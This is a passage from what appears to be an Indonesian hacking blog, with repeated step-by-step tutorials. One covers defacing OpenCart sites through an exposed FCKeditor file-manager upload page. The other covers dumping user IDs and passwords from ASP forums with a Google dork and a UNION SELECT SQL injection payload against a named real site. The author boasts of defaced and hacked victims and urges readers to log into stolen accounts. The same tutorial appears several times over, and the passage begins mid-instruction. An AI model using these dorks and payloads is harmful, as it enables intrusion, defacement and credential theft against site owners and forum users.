>>> admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. klo berhasil maka akan muncul tampilan seperti gambar di bawah ini 

    
5. lalu ubah ASP jadi PHP dan upload kalian ex :longfield.htm    
6. dah hasilnya bisa kalian liat dengan format url : http://targetkalian.eeq/filekalianupload.htm
contoh yang berhasil saya deface : klik di sini  
7. silakan coba sendiri 
===========================================================

Deface Site Power By OpenCart



1. langkah pertama buka google dan masukkan dork : power by opencart

2. setelah pencarian keluar carilah target yang mw di uji
3. tambhkan POC berikut di belakang url target :
>>> admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. klo berhasil maka akan muncul tampilan seperti gambar di bawah ini 

    
5. lalu ubah ASP jadi PHP dan upload kalian ex :longfield.htm    
6. dah hasilnya bisa kalian liat dengan format url : http://targetkalian.eeq/filekalianupload.htm
contoh yang berhasil saya deface : klik di sini  
7. silakan coba sendiri 
===========================================================

Basic Hacking Forum ASP



di atas adalah screenshot dari sebuah forum yang berhasil saya hack. namun ini hanya dasar dari sebuah SQL injection untuk forum. terlihat di sebelah iri ada USER ID dan di sebelahnya yang bertulisan DATED adalah PASSWORD beliau.. 
cara di atas yang saya lakukan di sebut  "nakal" .. langkah yang perlu anda lakukan untuk menembus daftar user dan id dari sebuah forum asp ;

1. ketik pada pencarian google (mati sekajap) : inurl:/forums.asp?iFor= 

2. setelah pencarian keluar carilah korban yang menurut anda tepat :
ex --->
 http://blablabla/forum/forums.asp?iFor=11
3. hapus angka yang ada di belakang url sehingga menjadi :
   http://www.siamrivers.com/forum/forums.asp?iFor=
4.  lalu masukkan mantra SQL injection :
   9+union+select+1,2,3,u_password,5,u_id,7,8,9+from+users
5. namun sebelumnya seperti sql injection kita harus mencari jumlah form/table dari forum tersebut 
6. setelah berhasil maka secara otomatis masuk ke halam seperti gambar di atas
7. dan sesuai penjelasan di atas ada user dan id
8. login lah ke dalam salah satu akun user anda akan mendapati email nama pass dari akun tersebut

===========================================================

Basic Hacking Forum ASP



di atas adalah screenshot dari sebuah forum yang berhasil saya hack. namun ini hanya dasar dari sebuah SQL injection untuk forum. terlihat di sebelah iri ada USER ID dan di sebelahnya yang bertulisan DATED adalah PASSWORD beliau.. 
cara di atas yang saya lakukan di sebut  "nakal" .. langkah yang perlu anda lakukan untuk menembus daftar user dan id dari sebuah forum asp ;

1. ketik pada pencarian google (mati sekajap) : inurl:/forums.asp?iFor= 

2. setelah pencarian keluar carilah korban yang menurut anda tepat :
ex --->
 http://blablabla/forum/forums.asp?iFor=11
3. hapus angka yang ada di belakang url sehingga menjadi :
   http://www.siamrivers.com/forum/forums.asp?iFor=
4.  lalu masukkan mantra SQL injection :
   9+union+select+1,2,3,u_password,5,u_id,7,8,9+from+users
5. namun sebelumnya seperti sql injection kita harus mencari jumlah form/table dari forum tersebut 
6. setelah berhasil maka secara otomatis masuk ke halam seperti gambar di atas
7. dan sesuai penjelasan di atas ada user dan id
8. login lah ke dalam salah satu akun user anda akan mendapati email nama pass dari akun tersebut

===========================================================

Basic Hacking Forum ASP



di atas adalah screenshot dari sebuah forum yang berhasil saya hack. namun ini hanya dasar dari sebuah SQL injection untuk forum. terlihat di sebelah iri ada USER ID dan di sebelahnya yang bertulisan DATED adalah PASSWORD beliau.. 
cara di atas yang saya lakukan di sebut  "nakal" .. langkah yang perlu anda lakukan untuk menembus daftar user dan id dari sebuah forum asp ;

1. ketik pada pencarian google (mati sekajap) : inurl:/forums.asp?iFor= 

2. setelah pencarian keluar carilah korban yang menurut anda tepat :
ex --->
 http://blablabla/forum/forums.asp?iFor=11
3. hapus angka yang ada di belakang url sehingga menjadi :
   http://www.siamrivers.com/forum/forums.asp?iFor=
4.  lalu masukkan mantra SQL injection :
   9+union+select+1,2,3,u_password,5,u_id,7,8,9+from+users
5. namun sebelumnya seperti sql injection kita harus mencari jumlah form/table dari forum tersebut 
6. setelah berhasil maka secara otomatis masuk ke halam seperti gambar di atas
7. dan sesuai penjelasan di atas ada user dan id
8. login lah ke dalam salah satu akun user anda akan mendapati email nama pass dari akun tersebut

===========================================================

Basic Hacking Forum ASP



di atas adalah screenshot dari sebuah forum yang berhasil saya hack. namun ini hanya dasar dari sebuah SQL injection untuk forum. terlihat di sebelah iri ada USER ID dan di sebelahnya yang bertulisan DATED adalah PASSWORD beliau.. 
cara di atas yang saya lakukan di sebut  "nakal" .. langkah yang perlu anda lakukan untuk menembus daftar user dan id dari sebuah forum asp ;

1. ketik pada pencarian google (mati sekajap) : inurl:/forums.asp?iFor= 

2. setelah pencarian keluar carilah korban yang menurut anda tepat :
ex --->
 http://blablabla/forum/forums.asp?iFor=11
3. hapus angka yang ada di belakang url sehingga menjadi :
   http://www.siamrivers.com/forum/forums.asp?iFor=
4.  lalu masukkan mantra SQL injection :
   9+union+select+1,2,3,u_password,5,u_id,7,8,9+from+users
5. namun sebelumnya seperti sql injection kita harus mencari jumlah form/table dari forum tersebut 
6. setelah berhasil maka secara otomatis masuk ke halam seperti gambar di atas
7. dan sesuai penjelasan di atas ada user dan id
8. login lah ke dalam salah satu akun user anda akan mendapati email nama pass dari akun tersebut

===========================================================